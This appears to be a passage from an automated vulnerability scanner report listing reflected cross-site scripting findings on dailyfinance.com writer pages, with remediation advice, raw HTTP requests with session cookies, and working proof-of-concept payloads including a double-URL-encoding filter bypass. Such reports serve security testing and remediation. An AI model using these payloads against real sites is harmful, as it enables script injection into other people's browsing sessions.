Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]...
<meta property="og:title" content="Gene Marcial7ff73"><img Src=a Onerror=alert(1)>401196f4fd2" /> ...[SNIP]...
1.501. http://www.dailyfinance.com/writers/gene-marcial/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /writers/gene-marcial/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 267aa"-alert(1)-"708541160 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /writers/gene-marcial/?267aa"-alert(1)-"708541160=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccb17"><img%20src%3da%20onerror%3dalert(1)>94d7abd786 was submitted in the REST URL parameter 2. This input was echoed as ccb17"><img src=a onerror=alert(1)>94d7abd786 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /writers/jean-chatzkyccb17"><img%20src%3da%20onerror%3dalert(1)>94d7abd786/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae752%2522%253bb011634ed1d was submitted in the REST URL parameter 2. This input was echoed as ae752";b011634ed1d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /writers/jean-chatzkyae752%2522%253bb011634ed1d/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
1.504. http://www.dailyfinance.com/writers/jean-chatzky/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /writers/jean-chatzky/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef8df"-alert(1)-"1778d902ef8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /writers/jean-chatzky/?ef8df"-alert(1)-"1778d902ef8=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22f2e"><img%20src%3da%20onerror%3dalert(1)>9e05323ba38 was submitted in the REST URL parameter 2. This input was echoed as 22f2e"><img src=a onerror=alert(1)>9e05323ba38 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /writers/jonathan-berr22f2e"><img%20src%3da%20onerror%3dalert(1)>9e05323ba38/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b234a%2522%253b98887a3489 was submitted in the REST URL parameter 2. This input was echoed as b234a";98887a3489 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /writers/jonathan-berrb234a%2522%253b98887a3489/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
s_265.prop1="Writers"; s_265.prop2="Jonathan Ber ...[SNIP]...
1.507. http://www.dailyfinance.com/writers/jonathan-berr/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /writers/jonathan-berr/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c43a"-alert(1)-"62aa7e5ffc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /writers/jonathan-berr/?6c43a"-alert(1)-"62aa7e5ffc=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d62ac"><img%20src%3da%20onerror%3dalert(1)>adcc6ec6c90 was submitted in the REST URL parameter 2. This input was echoed as d62ac"><img src=a onerror=alert(1)>adcc6ec6c90 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /writers/joseph-lazzarod62ac"><img%20src%3da%20onerror%3dalert(1)>adcc6ec6c90/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1ae6%2522%253ba45526d75e4 was submitted in the REST URL parameter 2. This input was echoed as b1ae6";a45526d75e4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /writers/joseph-lazzarob1ae6%2522%253ba45526d75e4/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
1.510. http://www.dailyfinance.com/writers/joseph-lazzaro/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /writers/joseph-lazzaro/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9d2c"-alert(1)-"48ffafa5a46 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /writers/joseph-lazzaro/?a9d2c"-alert(1)-"48ffafa5a46=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ea06%2522%253be7ab5b21b20 was submitted in the REST URL parameter 2. This input was echoed as 7ea06";e7ab5b21b20 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /writers/matthew-pulomena7ea06%2522%253be7ab5b21b20/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4568"><img%20src%3da%20onerror%3dalert(1)>97148da6843 was submitted in the REST URL parameter 2. This input was echoed as a4568"><img src=a onerror=alert(1)>97148da6843 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /writers/matthew-pulomenaa4568"><img%20src%3da%20onerror%3dalert(1)>97148da6843/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <meta property="og:title" content="Matthew Pulomenaa4568"><img Src=a Onerror=alert(1)>97148da6843" /> ...[SNIP]...
1.513. http://www.dailyfinance.com/writers/matthew-pulomena/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /writers/matthew-pulomena/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44c61"-alert(1)-"399a3cc268e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /writers/matthew-pulomena/?44c61"-alert(1)-"399a3cc268e=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e717f%2522%253b143a6ec7601 was submitted in the REST URL parameter 2. This input was echoed as e717f";143a6ec7601 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /writers/matthew-scotte717f%2522%253b143a6ec7601/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58323"><img%20src%3da%20onerror%3dalert(1)>91749706519 was submitted in the REST URL parameter 2. This input was echoed as 58323"><img src=a onerror=alert(1)>91749706519 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /writers/matthew-scott58323"><img%20src%3da%20onerror%3dalert(1)>91749706519/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <meta property="og:title" content="Matthew Scott58323"><img Src=a Onerror=alert(1)>91749706519" /> ...[SNIP]...
1.516. http://www.dailyfinance.com/writers/matthew-scott/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /writers/matthew-scott/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3641"-alert(1)-"583f7580ff6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /writers/matthew-scott/?c3641"-alert(1)-"583f7580ff6=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a226"><img%20src%3da%20onerror%3dalert(1)>24a1bd72e09 was submitted in the REST URL parameter 2. This input was echoed as 5a226"><img src=a onerror=alert(1)>24a1bd72e09 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /writers/mercedes-cardona5a226"><img%20src%3da%20onerror%3dalert(1)>24a1bd72e09/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload feb7c%2522%253b16627f19223 was submitted in the REST URL parameter 2. This input was echoed as feb7c";16627f19223 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /writers/mercedes-cardonafeb7c%2522%253b16627f19223/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
s_265.prop1="Writers"; s_265.prop2="Mercedes Car ...[SNIP]...
1.519. http://www.dailyfinance.com/writers/mercedes-cardona/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /writers/mercedes-cardona/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c57c7"-alert(1)-"65bd3b8cd75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /writers/mercedes-cardona/?c57c7"-alert(1)-"65bd3b8cd75=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9eab%2522%253ba8e637537d7 was submitted in the REST URL parameter 2. This input was echoed as a9eab";a8e637537d7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /writers/peter-cohana9eab%2522%253ba8e637537d7/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
